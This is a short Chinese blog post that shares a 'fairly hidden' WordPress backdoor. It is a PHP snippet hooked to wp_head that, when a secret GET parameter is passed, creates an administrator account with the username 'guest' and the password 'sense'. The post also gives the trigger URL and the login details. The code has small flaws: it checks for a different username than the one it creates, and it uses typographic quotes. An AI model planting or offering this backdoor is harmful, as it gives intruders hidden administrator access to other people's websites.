一直都在
不断前进和探索

比较隐蔽的wordpress后门代码一枚

<?php
add_action( ‘wp_head’, ‘my_sense’ );
function my_sense() {
if ( md5( $_GET[‘sense’] ) == ‘084e0343a0486ff05530df6c705c8bb4’ ) {
require( ‘wp-includes/registration.php’ );
if ( !username_exists( ‘mr_admin’ ) ) {
$user_id = wp_create_user( ‘guest’, ‘sense’ );
$user = new WP_User( $user_id );
$user->set_role( ‘administrator’ );
}
}
}
?>

 

domain/?sense=guest

带上参数访问后自动增加一个超级管理员用户。。用户名:guest 密码:sense

赞(0)
未经允许不得转载:吟风博客 » 比较隐蔽的wordpress后门代码一枚
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

一个纯粹用来记录的博客

Url在线批量打开